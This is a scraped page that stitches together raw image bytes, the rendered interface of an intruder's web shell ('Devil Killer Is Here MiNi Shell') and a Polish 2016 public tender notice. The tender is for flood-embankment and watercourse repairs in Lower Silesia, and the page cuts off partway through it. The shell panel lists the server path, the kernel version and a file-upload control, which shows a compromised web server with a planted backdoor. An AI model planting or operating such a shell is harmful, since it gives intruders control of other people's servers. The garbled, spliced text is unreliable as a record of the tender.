JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160325/68632-N-2016.html

<p class="kh_header"><b>Wrocław: Prace interwencyjne - usuwanie uszkodzeń na ciekach i urządzeniach wodnych administrowanych przez DZMiUW we Wrocławiu</b><br>
<b>Numer ogłoszenia: 68632 - 2016; data zamieszczenia: 25.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląski Zarząd Melioracji i Urządzeń Wodnych we Wrocławiu , al. J. Matejki 5, 50-333 Wrocław, woj. dolnośląskie, tel. 071 3226681 do 83, faks 071 3227929.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzmiuw.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace interwencyjne - usuwanie uszkodzeń na ciekach i urządzeniach wodnych administrowanych przez DZMiUW we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z następujących części:
1)	Prace interwencyjne - usuwanie uszkodzeń na ciekach i urządzeniach wodnych, pow. Trzebnica, Wołów, Góra, Milicz
2)	Prace interwencyjne - usuwanie uszkodzeń na ciekach i urządzeniach wodnych, pow. Oława, Strzelin, Oleśnica
3)	Prace interwencyjne - usuwanie uszkodzeń na ciekach i urządzeniach wodnych, pow. Wrocław, Środa Śląska

Przedmiotem zamówienia są prace interwencyjne polegające na usuwaniu uszkodzeń powstałych na ciekach i urządzeniach wodnych (wałach przeciwpowodziowych). 

Podstawowy zakres prac przy usuwaniu uszkodzeń powstałych na ciekach obejmuje:
- przygotowanie miejsca pracy,
- zabudowę wyrwy, plantowanie skarpy, formowanie skarpy i zagęszczenie,
- wykonanie w stopie skarpy opasek z kiszek faszynowych pojedynczych o średnicy 20 cm,
- darniowanie skarpy pasem szerokości min. 1,5 m i obsiew pozostałej części,
- oczyszczenie i uporządkowanie terenu w obrębie prowadzonych prac.

Podstawowy zakres prac przy usuwaniu uszkodzeń powstałych na urządzeniach wodnych (wałach przeciwpowodziowych) obejmuje:
- przygotowanie miejsca pracy,
- wykoszenie i wygrabienie porostów w obrębie uszkodzenia,
- usunięcie warstwy ziemi urodzajnej (humusu),
- wykonanie wykopu do poziomu korytarzy wykonanych przez zwierzęta,
- zasypanie wykopów gruntem z odkładu i zakupionym,
- zagęszczenie, plantowanie, humusowanie,
- obsiew,
- oczyszczenie i uporządkowanie terenu w obrębie prowadzonych prac.

Zagęszczenie gruntu w zabudowanej wyrwie do Is większe równe 95. Stopień zagęszczenia potwierdzony przez geotechnika.

Przewidywana max. łączna (w ciągu trwania umowy) ilość m3 na usunięcie uszkodzeń na ciekach i urządzeniach wodnych wynosi: dla cz. 1) 983 m3; dla cz. 2) 363 m3 ; dla cz. 3) 664 m3

Realizacja umowy na usunięcie uszkodzeń na ciekach i urządzeniach wodnych odbywać się będzie na podstawie odrębnych zleceń udzielanych Wykonawcy w zależności od potrzeb. Jako jednostkę do rozliczeń przyjmuje się 1 m3 usuniętego uszkodzenia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.72.18.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia.
Zamawiający uzna za spełniony warunek dotyczący wiedzy i doświadczenia, jeżeli wykonawca wykaże, że 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączenia dowodów (w formie oryginału lub kopii poświadczonych za zgodność z oryginałem) potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie (m.in. poświadczenia, oświadczenia, referencje, inne) wykonał co najmniej 3 zamówienia polegające na naprawie, remoncie lub wykonaniu ziemnych obiektów liniowych lub skarp brzegowych (dot. wszystkich części zamówienia).

W zakresie wykazania spełniania przez Wykonawcę tego warunku należy przedłożyć dokumenty określone w pkt 8. 1.2 niniejszej SIWZ.
      
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. oraz wyjaśnienia (dotyczy wiedzy i doświadczenia) w jakiej formie zostanie ona przekazana. Dokument powinien zawierać wyraźne nawiązanie do uczestnictwa w dowolnej, dozwolonej przez prawo formie (jako podwykonawca, doradca czy na innej podstawie) w wykonaniu zamówienia. Zobowiązanie ma zawierać następujące informacje:
      a) zakres dostępnych wykonawcy zasobów innego podmiotu,
      b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy  wykonywaniu zamówienia,
      c) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
      d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.

Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować potencjałem technicznym.
Zamawiający uzna za spełniony warunek dotyczący dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia, jeżeli wykonawca wykaże, że dysponuje sprzętem mechanicznym 
tj. co najmniej 1 koparką, 1 sprzętem do transportu np. ciągnikiem z przyczepą lub samochodem samowyładowczym  i 1 sprzętem do zagęszczania gruntu (dot. wszystkich części zamówienia).

Zamawiający uzna warunek za spełniony, o ile wykonawca złoży wykaz którego wzór stanowi załącznik Nr 5 - część IV SIWZ Formularze.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. oraz wyjaśnienia (dotyczy wiedzy i doświadczenia) w jakiej formie zostanie ona przekazana. Dokument powinien zawierać wyraźne nawiązanie do uczestnictwa w dowolnej, dozwolonej przez prawo formie (jako podwykonawca, doradca czy na innej podstawie) w wykonaniu zamówienia. Zobowiązanie ma zawierać następujące informacje:
      a) zakres dostępnych wykonawcy zasobów innego podmiotu,
      b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy  wykonywaniu zamówienia,
      c) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
      d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.

Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia.
Zamawiający uzna za spełniony warunek dotyczący posiadania osób zdolnych do wykonania zamówienia, jeżeli wykonawca wykaże, że dysponuje co najmniej: 
- 1 osobą do prowadzenia nadzoru przyrodniczego rozumianego jako nadzór i kontrola nad sposobem wykonywania prac, który zagwarantuje właściwą reakcję w przypadku sytuacji nagłych, nieprzewidzianych 
i zminimalizuje ryzyko negatywnego oddziaływania na elementy przyrodnicze występujące w obrębie
i w bezpośrednim sąsiedztwie wykonywanych prac tj. co najmniej 1 osobą legitymującą się wyższym wykształceniem o specjalności przyrodniczej (np. zoologia, botanika, ochrona środowiska) 
i doświadczeniem  tj. sprawowaniem co najmniej 1 nadzoru przyrodniczego przy realizacji prac.
- 1 osobą posiadającą doświadczenie i wiedzę z zakresu geotechniki.

Zamawiający uzna warunek za spełniony o ile wykonawca złoży wykaz którego wzór stanowi załącznik Nr 6 - część IV SIWZ Formularze.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. oraz wyjaśnienia (dotyczy wiedzy i doświadczenia) w jakiej formie zostanie ona przekazana. Dokument powinien zawierać wyraźne nawiązanie do uczestnictwa w dowolnej, dozwolonej przez prawo formie (jako podwykonawca, doradca czy na innej podstawie) w wykonaniu zamówienia. Zobowiązanie ma zawierać następujące informacje:
      a) zakres dostępnych wykonawcy zasobów innego podmiotu,
      b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy  wykonywaniu zamówienia,
      c) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
      d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.

Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.

Wykonawcy mogą wspólnie ubiegać się o zamówienie.
W przypadku udziału w postępowaniu Wykonawców występujących wspólnie, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania 
w postępowaniu o udzielenie zamówienia i podpisania umowy w sprawie zamówienia publicznego. 
W przypadku udziału w postępowaniu Wykonawców występujących wspólnie, Zamawiający dopuszcza możliwość łącznego spełniania i dokumentowania ww. warunków.
Okoliczności uzasadniające wykluczenie z postępowania w oparciu o przepisy art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych zachodzące choćby względem pojedynczego Wykonawcy dyskwalifikują całą grupę Wykonawców ubiegających się wspólnie o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi być podpisana przez osoby upełnomocnione do reprezentowania wykonawcy 
i zaciągania w jego imieniu zobowiązań finansowych w wysokości odpowiadającej cenie oferty. Oznacza to, iż jeżeli z dokumentu określającego status prawny wykonawcy lub pełnomocnictwa wynika, iż do reprezentowania wykonawcy upoważnionych jest łącznie kilka osób dokumenty wchodzące w skład oferty muszą być podpisane przez wszystkie te osoby.	Pełnomocnictwo osób podpisujących ofertę do reprezentowania wykonawcy, zaciągania 
w jego imieniu zobowiązań finansowych w wysokości odpowiadającej cenie oferty oraz podpisania oferty musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli pełnomocnictwo takie nie wynika wprost z dokumentu stwierdzającego status prawny oferenta, to do oferty należy dołączyć oryginał lub poświadczoną notarialnie za zgodność z oryginałem kopię pełnomocnictwa wystawionego na reprezentanta wykonawcy przez osoby do tego umocowane.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Czas reakcji - podjęcia działania - 20</li>
<li>3 - Gwarancja na przdmiot zamówienia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzmiuw.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Zarząd Melioracji i Urządzeń Wodnych we Wrocławiu, al. Jana Matejki 6 (III piętro), 55-333 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2016 godzina 09:00, miejsce: Dolnośląski Zarząd Melioracji i Urządzeń Wodnych we Wrocławiu, al. Jana Matejki 5 (sekretariat), 55-333 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1)	Prace interwencyjne - usuwanie uszkodzeń na ciekach i urządzeniach wodnych, pow. Trzebnica, Wołów, Góra, Milicz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są prace interwencyjne polegające na usuwaniu uszkodzeń powstałych na ciekach i urządzeniach wodnych (wałach przeciwpowodziowych). 

Podstawowy zakres prac przy usuwaniu uszkodzeń powstałych na ciekach obejmuje:
- przygotowanie miejsca pracy,
- zabudowę wyrwy, plantowanie skarpy, formowanie skarpy i zagęszczenie,
- wykonanie w stopie skarpy opasek z kiszek faszynowych pojedynczych o średnicy 20 cm,
- darniowanie skarpy pasem szerokości min. 1,5 m i obsiew pozostałej części,
- oczyszczenie i uporządkowanie terenu w obrębie prowadzonych prac.

Podstawowy zakres prac przy usuwaniu uszkodzeń powstałych na urządzeniach wodnych (wałach przeciwpowodziowych) obejmuje:
- przygotowanie miejsca pracy,
- wykoszenie i wygrabienie porostów w obrębie uszkodzenia,
- usunięcie warstwy ziemi urodzajnej (humusu),
- wykonanie wykopu do poziomu korytarzy wykonanych przez zwierzęta,
- zasypanie wykopów gruntem z odkładu i zakupionym,
- zagęszczenie, plantowanie, humusowanie,
- obsiew,
- oczyszczenie i uporządkowanie terenu w obrębie prowadzonych prac.

Zagęszczenie gruntu w zabudowanej wyrwie do Is większej równej 95. Stopień zagęszczenia potwierdzony przez geotechnika.

Przewidywana max. łączna (w ciągu trwania umowy) ilość m3 na usunięcie uszkodzeń na ciekach i urządzeniach wodnych wynosi 983 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.72.18.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Czas reakcji - podjęcia działania - 20</li>
<li>3. Gwarancja na przdmiot zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2)	Prace interwencyjne - usuwanie uszkodzeń na ciekach i urządzeniach wodnych, pow. Oława, Strzelin, Oleśnica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są prace interwencyjne polegające na usuwaniu uszkodzeń powstałych na ciekach i urządzeniach wodnych (wałach przeciwpowodziowych). 

Podstawowy zakres prac przy usuwaniu uszkodzeń powstałych na ciekach obejmuje:
- przygotowanie miejsca pracy,
- zabudowę wyrwy, plantowanie skarpy, formowanie skarpy i zagęszczenie,
